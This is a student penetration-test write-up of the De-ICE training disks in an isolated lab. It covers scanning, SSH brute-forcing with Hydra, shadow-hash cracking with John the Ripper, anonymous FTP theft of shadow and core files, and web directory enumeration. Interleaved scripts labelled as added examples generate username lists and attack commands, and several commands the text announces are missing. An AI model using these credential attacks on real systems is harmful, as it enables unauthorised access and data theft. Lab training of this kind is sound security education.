Final Penetration Test Report
12/17/2012
Final penetration test report for De-ICE v1.0, 1.1, and 2.0
Network Security Analysis
Caleb Walter
12/17/2012
Unit 4 – Information Gathering
Group E Security Analysis
Caleb Walter, calwalte@uat.edu

All penetration tests were done using BackTrack 5 R3 within a virtualized environment, with each OS in its own VM, attached to a virtual switch with no route to any outside network.

De-ICE v1.100

To begin the penetration test of the first disk of the De-ICE collection, an nmap scan with service-version and operating-system detection was run against the disk's automatically assigned IPv4 address to list every open port, the service behind it, and the OS. Pinging the disk first proved unsuccessful, as it was dropping or rejecting ICMP echo requests; a host that does not answer ping has to be scanned with nmap's ping-based host discovery turned off, or nmap reports it as down and skips it. Once the scan completed, numerous open ports were found along with their service and version. These services, which provide many common attack vectors, included FTP, SSH, SMTP, and HTTP among others, and were the next step in the investigation. Seeing that the disk was listening on port 80 and running an Apache server, a quick visit to the IP in a browser to see what the website held was in order. Upon navigating to the site, it was found that employee email addresses, especially those of the IT department, were publicly posted to give an avenue of communication for any questions or concerns. These were recorded, minus the "@herot.net" portion and with the order of surname and initial reversed, as potential SSH and FTP usernames. The first attack vector to be investigated was the SSH service, as the FTP service appeared to be broken or at least misconfigured according to the initial nmap scan. Using the newly created list of possible usernames, Hydra was run, using the command below, to attempt to log into the SSH server and report the credentials that were accepted.
This command instructs Hydra to take its login names from the file "PossibleUsernames", to try the word "password" and the username itself as the password for each login, and to target the SSH service running on 192.168.1.100. After a few minutes the Hydra run completed, and an accepted username and password were found: bbanter and bbanter respectively. This was confirmed with a successful SSH login, which granted all of bbanter's access to the box. Once on the target machine, the first destination was the "/etc" directory, where the shadow file and the other account files are kept. These files list every user the system has, and, in the case of shadow, their password hashes. Unfortunately, the shadow file was not readable by bbanter, but the "aadams" username was confirmed by the system and appeared in the root users' group. With aadams and ccoffee both confirmed as usernames on the system, another Hydra attack was run with the same parameters as before, only replacing the single-password option (-p) with a wordlist (-P) to attempt a dictionary attack on the service. Just as before, the attack succeeded and a username and password were found: aadams and nostradamus respectively. Also as before, a successful SSH login to the target confirmed this. The shadow file was now fully readable, as aadams is a root-level user, and it provided the full password hash of every other account. With the full hashes, as well as the hash scheme used to store them (identifiable from the $id$ prefix of each entry), now in hand, the next logical step was to attempt to crack these hashes in order to recover the actual passwords. This was done using John the Ripper, with the hashes copied into their own file and the same wordlist collection as used in the previous Hydra attacks.
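The username derivation and the two Hydra passes just described, as an added example rather than a command from the report. It assumes the mailboxes on the page were surname followed by first-name initial (adamsa@herot.net becomes aadams), that the target is 192.168.1.100, and that the wordlist lives at the BackTrack default path; EMAILS is constructed sample input, not the addresses from the disk.

```shell
#!/bin/sh
# Added example, not a command from the report. Builds the candidate
# username list the way the text describes (strip "@herot.net", move the
# initial in front of the surname) and prints the two Hydra runs.
# Assumptions: mailboxes are surname followed by first-name initial
# (adamsa@herot.net), the target is 192.168.1.100, and the wordlist path is
# the BackTrack default. EMAILS is constructed sample input.

EMAILS='adamsa@herot.net
banterb@herot.net
coffeec@herot.net'

# derive_user: "adamsa@herot.net" -> "aadams"
derive_user() {
    local_part=${1%%@*}               # drop the domain
    surname=${local_part%?}           # everything but the last character
    initial=${local_part#"$surname"}  # the last character
    printf '%s\n' "${initial}${surname}"
}

# build_userlist: one candidate per line, deduplicated, written to $1
build_userlist() {
    printf '%s\n' "$EMAILS" | while IFS= read -r addr; do
        if [ -n "$addr" ]; then derive_user "$addr"; fi
    done | sort -u > "$1"
}

# hydra_cmd: the cheap first pass. -L = login list, -p = the one password
# "password", -e s = also try each login as its own password, -t 4 = few
# parallel connections so sshd's MaxStartups does not start dropping them.
hydra_cmd() {  # $1 = user list, $2 = target
    printf 'hydra -L %s -p password -e s -t 4 ssh://%s\n' "$1" "$2"
}

# wordlist_cmd: the follow-up dictionary pass; -P replaces -p
wordlist_cmd() {  # $1 = user list, $2 = wordlist, $3 = target
    printf 'hydra -L %s -P %s -t 4 ssh://%s\n' "$1" "$2" "$3"
}

USERS=$(mktemp)
build_userlist "$USERS"
cat "$USERS"
hydra_cmd "$USERS" 192.168.1.100
wordlist_cmd "$USERS" /pentest/passwords/wordlists/darkc0de.lst 192.168.1.100
```

The first pass is deliberately tiny (one fixed password plus login-as-password), because it finishes in seconds and, as the report shows, is often enough; the wordlist pass only pays for itself once the cheap guesses fail.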
This revealed the root account's password to be the word "tarot". This was confirmed by switching to the superuser (su) within an SSH session as aadams on the target system, which gave full, unrestricted access to the box.

With this newfound access, a little directory navigation was in order, either to find some interesting information itself or a way to access such information, perhaps via the FTP server from earlier. After a short while, a rather interesting file entitled salary_dec2003 was found within the FTP server's incoming folder. This file presumably holds the salary and pay information for some, if not all, employees of the company, and perhaps other sensitive financial information about them. Unfortunately, the file had a ".enc" extension, indicating that it had been encrypted with OpenSSL's enc tool rather than merely encoded, and it had to be decrypted to be of any use. Using OpenSSL, the file was found to be encrypted with 128-bit AES, and could then be decrypted fairly easily. This was done with the following command:

This command invokes OpenSSL in decrypt mode, names the cipher (128-bit AES; OpenSSL does not read the cipher from the file, so it must be specified), and writes the output under a new file name; it was run with root permissions so that the output could be written next to the original. With this newly decrypted .csv file, the only stumbling block now was how to get it off the box. As seen earlier in the nmap scan, there was indeed an FTP server running; however, it was either broken, deactivated, or misconfigured. This could be explored further in the FTP server's config file, vsftpd.conf. Upon reviewing this file, it was found that vsftpd was not running, and was not configured to run in standalone mode as opposed to under inetd. This change was made, a simple uncommenting of one option, and the FTP server was back up and running.
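The OpenSSL step above, and the 256-bit variant with a password file used on the 1.110 disk later in this report, as an added example that round-trips a constructed CSV so both decrypt forms can be tried offline. This is not a command from the report: the file names, the password "s3cret" and the CSV content are made up for the example.

```shell
#!/bin/sh
# Added example, not a command from the report. Encrypts a constructed CSV
# with `openssl enc` and then decrypts it both ways the report uses: 128-bit
# AES with the password on the command line (the 1.100 salary file) and
# 256-bit AES with the password read from a file (the 1.110 customer file).
# File names, the password and the CSV content are made up for the example.

SAMPLE_CSV='employee,salary
aadams,55000
bbanter,41000'

# encrypt_sample: write a salted ".enc" file ($1) with cipher $2 and password $3.
# The "Salted__" header plus 8 bytes of salt is all the file records about
# how it was made; the cipher name is NOT stored in the file.
encrypt_sample() {
    printf '%s\n' "$SAMPLE_CSV" | openssl enc -"$2" -salt -pass "pass:$3" -out "$1"
}

# is_openssl_enc: ".enc" is only a naming convention; the header is the tell.
is_openssl_enc() {
    [ "$(head -c 8 "$1")" = "Salted__" ]
}

# decrypt_with_password: $1 = .enc, $2 = cipher, $3 = password, $4 = output.
# The cipher must be supplied; with the wrong one (or the wrong password)
# OpenSSL fails the padding check and reports "bad decrypt".
decrypt_with_password() {
    openssl enc -d -"$2" -pass "pass:$3" -in "$1" -out "$4" 2>/dev/null
}

# decrypt_with_passfile: same, but the password is the first line of file $3
decrypt_with_passfile() {
    openssl enc -d -"$2" -pass "file:$3" -in "$1" -out "$4" 2>/dev/null
}

if command -v openssl >/dev/null 2>&1; then
    WORK=$(mktemp -d)
    encrypt_sample "$WORK/salary_dec2003.enc" aes-128-cbc s3cret 2>/dev/null
    is_openssl_enc "$WORK/salary_dec2003.enc" && echo "salted OpenSSL enc file"
    decrypt_with_password "$WORK/salary_dec2003.enc" aes-128-cbc s3cret "$WORK/salary_dec2003.csv"
    cat "$WORK/salary_dec2003.csv"
    printf '%s\n' s3cret > "$WORK/passfile"
    encrypt_sample "$WORK/customer_accounts.enc" aes-256-cbc s3cret 2>/dev/null
    decrypt_with_passfile "$WORK/customer_accounts.enc" aes-256-cbc "$WORK/passfile" "$WORK/customer_accounts.csv"
    cat "$WORK/customer_accounts.csv"
fi
```

One caveat when repeating this against 2012-era disks from a current machine: OpenSSL 1.1.0 changed the default digest used to derive the key from the password from MD5 to SHA-256, so a file made by OpenSSL 0.9.8 or 1.0 will fail with "bad decrypt" on a modern build even with the right password until `-md md5` is added to the decrypt command.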
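The vsftpd.conf review above, and the anonymous-access misconfiguration exploited on the 1.110 disk in the next section, as an added example that audits a config file for the two settings that mattered on these disks. This is not the disk's configuration: BROKEN_CONF is constructed in the commented-out style of the stock vsftpd sample file.

```shell
#!/bin/sh
# Added example, not from the report: read a vsftpd.conf and report whether
# the daemon is set to run standalone (listen=YES) rather than wait for
# inetd, and whether anonymous logins are allowed. BROKEN_CONF is a
# constructed file in the style of the stock sample config.

BROKEN_CONF='# Example config file /etc/vsftpd.conf
anonymous_enable=YES
local_enable=YES
write_enable=YES
#listen=YES
listen_ipv6=NO'

# conf_value: effective value of option $2 in file $1, ignoring commented
# lines; if the option is repeated, the last line is taken here.
conf_value() {
    grep -E "^[[:space:]]*$2=" "$1" | tail -n 1 | cut -d= -f2- | tr -d '[:space:]'
}

# ftp_mode: "standalone" when listen=YES, "inetd" otherwise. vsftpd's
# built-in default is listen=NO, so with the line commented out nothing
# answers on port 21 unless inetd/xinetd has been told to spawn vsftpd,
# which is exactly the "running but broken" picture nmap gave.
ftp_mode() {
    case "$(conf_value "$1" listen)" in
        YES|yes) echo standalone ;;
        *)       echo inetd ;;
    esac
}

# anon_access: "open" when anonymous logins are allowed. The compiled-in
# default for anonymous_enable is YES, so only an explicit NO closes it.
anon_access() {
    v=$(conf_value "$1" anonymous_enable)
    case "${v:-YES}" in
        YES|yes) echo open ;;
        *)       echo closed ;;
    esac
}

# enable_standalone: the one-line change the report made, written from $1 to $2
enable_standalone() {
    if grep -qE '^[[:space:]]*#[[:space:]]*listen=' "$1"; then
        sed -E 's/^[[:space:]]*#[[:space:]]*listen=.*/listen=YES/' "$1" > "$2"
    else
        { cat "$1"; echo 'listen=YES'; } > "$2"
    fi
}

CONF=$(mktemp); printf '%s\n' "$BROKEN_CONF" > "$CONF"
echo "before: mode=$(ftp_mode "$CONF") anonymous=$(anon_access "$CONF")"
FIXED=$(mktemp); enable_standalone "$CONF" "$FIXED"
echo "after:  mode=$(ftp_mode "$FIXED") anonymous=$(anon_access "$FIXED")"
```

From the attacker's side the change is just listen=YES; from the defender's side the same audit flags anonymous_enable=YES, which on the 1.110 disk is what let the shadow and core files be pulled without credentials. Note also that on most distributions root is listed in /etc/ftpusers and vsftpd refuses the login; the root FTP login that worked on the 1.100 disk would not on a stock install.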
Connecting to the FTP server using the root username and password retrieved earlier was then a trivial command. Once logged into the FTP server, the decrypted and renamed December 2003 salary file was pulled down onto the attacking system.

De-ICE v1.110

Just as before, the first action taken in this penetration test was a service- and operating-system-detection nmap scan of the target system's IP, 192.168.1.110. The results showed several open ports on the system, including several from the previous test, such as FTP, SSH, and HTTP. There was also an additional port open for CUPS, the printing and print-spooling service for *nix systems.

The first attack vector explored in this test was the FTP server, since unlike in the previous test this server showed full functionality, while the SSH service gave questionable results. A common misconfiguration, or a setting simply left on, for many FTP servers is that they allow anonymous access to the files stored within, and sometimes the wrong files get stored in the wrong places. Attempting to log on to the FTP server with the username "anonymous" and a blank password resulted in a successful login. After a quick sift through the available directories, it was found that both a core file and the shadow file could be freely downloaded; between them they potentially contain every username and password hash on the system. Once the core and shadow files were downloaded from the FTP server, a quick "strings" run against the core file printed every printable string in it, including the usernames bbanter, aadams, ccoffee, and root, along with a password hash for each one.
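The strings-to-Shadow-file step just described, together with the John the Ripper runs used on both disks, as an added example: it pulls shadow-format entries out of whatever `strings` produces, labels the hash scheme of each entry from its crypt(3) prefix, and prints the John invocations. This is not the report's own command; STRINGS_OUT is a constructed stand-in for `strings core`, and the hash fields in it are placeholders, not real hashes.

```shell
#!/bin/sh
# Added example, not from the report: recover shadow-format entries from the
# text that `strings` pulls out of a binary (the core file served by the
# 1.110 FTP server), label the hash scheme of each, and print the John the
# Ripper run. STRINGS_OUT is constructed; the hash fields are placeholders.

STRINGS_OUT='_IO_stdin_used
root:$1$AbCdEfGh$placeholderplaceholderx:15000:0:99999:7:::
/lib/ld-linux.so.2
aadams:$6$saltsalt$placeholder:15000:0:99999:7:::
GLIBC_2.0
bbanter:!:15000:0:99999:7:::
ccoffee:$5$saltsalt$placeholder:15000:0:99999:7:::
nobody:*:15000:0:99999:7:::'

# extract_shadow: keep only lines shaped like /etc/shadow entries
# (name, hash, then seven numeric-or-empty ageing fields), from stdin
extract_shadow() {
    grep -E '^[a-z_][a-z0-9_-]*:[^:]*(:[0-9]*){7}$'
}

# hash_type: classify the second field by its crypt(3) prefix; the name
# printed is the matching John --format value
hash_type() {
    h=$(printf '%s' "$1" | cut -d: -f2)
    case "$h" in
        '$1$'*)   echo md5crypt ;;
        '$5$'*)   echo sha256crypt ;;
        '$6$'*)   echo sha512crypt ;;
        '$2a$'*|'$2b$'*|'$2y$'*) echo bcrypt ;;
        ''|'!'*|'*'*) echo locked ;;   # no password, or account disabled
        *)        echo descrypt ;;     # 13-character traditional DES crypt
    esac
}

# crackable: drop locked entries so John is not fed accounts it cannot crack
crackable() {
    while IFS= read -r line; do
        if [ "$(hash_type "$line")" != locked ]; then printf '%s\n' "$line"; fi
    done
}

# john_cmds: John loads one hash format per run, so print one wordlist run
# per scheme present in file $1 (wordlist $2), then the --show to read results
john_cmds() {
    crackable < "$1" | while IFS= read -r line; do hash_type "$line"; done \
      | sort -u | while IFS= read -r fmt; do
        printf 'john --wordlist=%s --format=%s %s\n' "$2" "$fmt" "$1"
      done
    printf 'john --show %s\n' "$1"
}

SHADOW=$(mktemp)
printf '%s\n' "$STRINGS_OUT" | extract_shadow > "$SHADOW"
cat "$SHADOW"
john_cmds "$SHADOW" /pentest/passwords/wordlists/darkc0de.lst
```

The wordlist path is the BackTrack default and is only printed, not run. Sorting the entries by scheme matters in practice: a shadow file with mixed $1$ and $6$ entries silently crack only the format John picked first unless each format is given its own run.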
These usernames and password hashes were separated out and put into a new text file entitled "Shadow", so that it could be the specific target of a standard password attack. John the Ripper was once again employed for this task, using the same wordlists as the previous test and run against the "/root/Shadow" file to attempt to crack the hashes. After a few short minutes, John came up with two cracked hashes: the root account and ccoffee's account. Now that two usernames and passwords had been acquired, it was time to investigate the SSH service and see about getting a root-level remote shell on the target. A standard SSH login was made to the target using ccoffee's credentials. Once this login succeeded, the next step was the immediate escalation of privileges to the superuser account. Directory investigation and enumeration was then carried out as root, and an interesting discovery was made within the "/home/root/.save" directory: a spreadsheet entitled "customer_accounts". However, just as before, this file was OpenSSL-encrypted rather than merely encoded, and needed to be decrypted and renamed to be of any use. This was done just as before, using OpenSSL and the following command:

This command instructs OpenSSL to decrypt the input file with the 256-bit AES cipher, to read the salt from the file's "Salted__" header and discard it, and to write the output as a plain .csv file. It also points OpenSSL at a password file to use against the encrypted file. After the file was successfully decrypted, it was simply a matter of running cat against it to reveal its contents without opening it in Excel.

De-ICE v2.100

As has become almost tradition with these tests, the first step in this penetration test was to run a service-detection and operating-system scan against the target system.
This time, however, was a little different in that nmap detected two separate IPs in the range, 192.168.2.100 and 192.168.2.101. On the .100 target, FTP and SSH once again appeared, as well as HTTP, SMTP, and the related open mail-service ports. The .101 machine was a little less forthcoming, showing only an Apache server on port 80. Since both machines were running Apache, navigating to their respective IPs in a web browser was the next step. The .100 box revealed a large number of potential usernames in the form of company email addresses, appearing to be last names only. The addresses were all distilled down to their last names and saved into a text file for further investigation. The .101 box seemed rather innocuous, except that it contained an FTP/SVN-like file-sharing structure, which is often misconfigured or populated with files from unwitting employees with access. Checking for valid directories within this structure was the next step, which was done using the DirBuster tool from OWASP; it enumerates a website's files and directories by requesting each entry of a wordlist, in the manner of a dictionary attack against the site itself. The "wordlist" for this attack was the set of potential usernames gathered from the .100 box earlier, with a tilde (~) prepended to each to represent a per-user directory (Apache's UserDir convention, /~name/). It was found that ~root, ~havisham, ~magwitch, and ~pirrip directories existed on the website. A full web-server scan was then initiated against the .101 box using Nikto, with the host as the target and ~pirrip/ as the root directory for the scan. After the scan finished, it appeared that along with the ~pirrip directory there was also a ~pirrip/.ssh directory, and this redirected to a location within the website. A .ssh directory reachable over HTTP deserves close attention, since it is where a user's private keys and authorized_keys file would normally live.
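The tilde-prefixed UserDir enumeration above, as an added example rather than the report's DirBuster run: it builds the ~name wordlist from surname-only addresses, probes each candidate with curl, reads the HTTP status the way DirBuster does, and prints the follow-up Nikto command. The addresses in EMAILS are constructed, and the target host 192.168.2.101 is taken from the report.

```shell
#!/bin/sh
# Added example, not from the report: turn surname-only addresses into
# Apache UserDir candidates (/~name/) and probe them over HTTP, which is
# the hand-rolled equivalent of the DirBuster run with a tilde-prefixed
# username list. EMAILS is constructed sample input.

EMAILS='havisham@example.com
magwitch@example.com
pirrip@example.com
HAVISHAM@example.com'

# userdir_wordlist: "pirrip@example.com" -> "~pirrip", lower-cased, deduped
userdir_wordlist() {
    printf '%s\n' "$EMAILS" | cut -d@ -f1 | tr 'A-Z' 'a-z' | sort -u | sed 's/^/~/'
}

# classify: what an HTTP status says about a candidate directory.
# 403 still means "exists": Apache returns it for a real directory that
# has no index and directory listing disabled, so it must not be dropped.
classify() {
    case "$1" in
        200|403) echo present ;;
        301|302) echo redirect ;;   # e.g. the /~pirrip/.ssh hit in the report
        404)     echo absent ;;
        *)       echo unknown ;;
    esac
}

# probe: GET each candidate on host $1, print "<candidate> <status> <verdict>"
probe() {
    userdir_wordlist | while IFS= read -r dir; do
        code=$(curl -s -o /dev/null -w '%{http_code}' "http://$1/$dir/")
        printf '%s %s %s\n' "$dir" "$code" "$(classify "$code")"
    done
}

# nikto_cmd: the next step on a hit, scanning with the found directory as root
nikto_cmd() {  # $1 = host, $2 = directory such as ~pirrip
    printf 'nikto -host %s -root /%s/\n' "$1" "$2"
}

userdir_wordlist
nikto_cmd 192.168.2.101 '~pirrip'
# only touch the network when explicitly asked, e.g. PROBE_HOST=192.168.2.101
if [ -n "${PROBE_HOST:-}" ]; then probe "$PROBE_HOST"; fi
```

Probing from the shell rather than DirBuster makes the 403-versus-404 distinction explicit, which is the whole signal in UserDir enumeration: a 403 on /~name/ confirms the account exists even when nothing in it is readable.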
After this was discovered, the next attack vector was the mail server on the .100 box, which I figured I might be able to access in order to investigate some of the emails.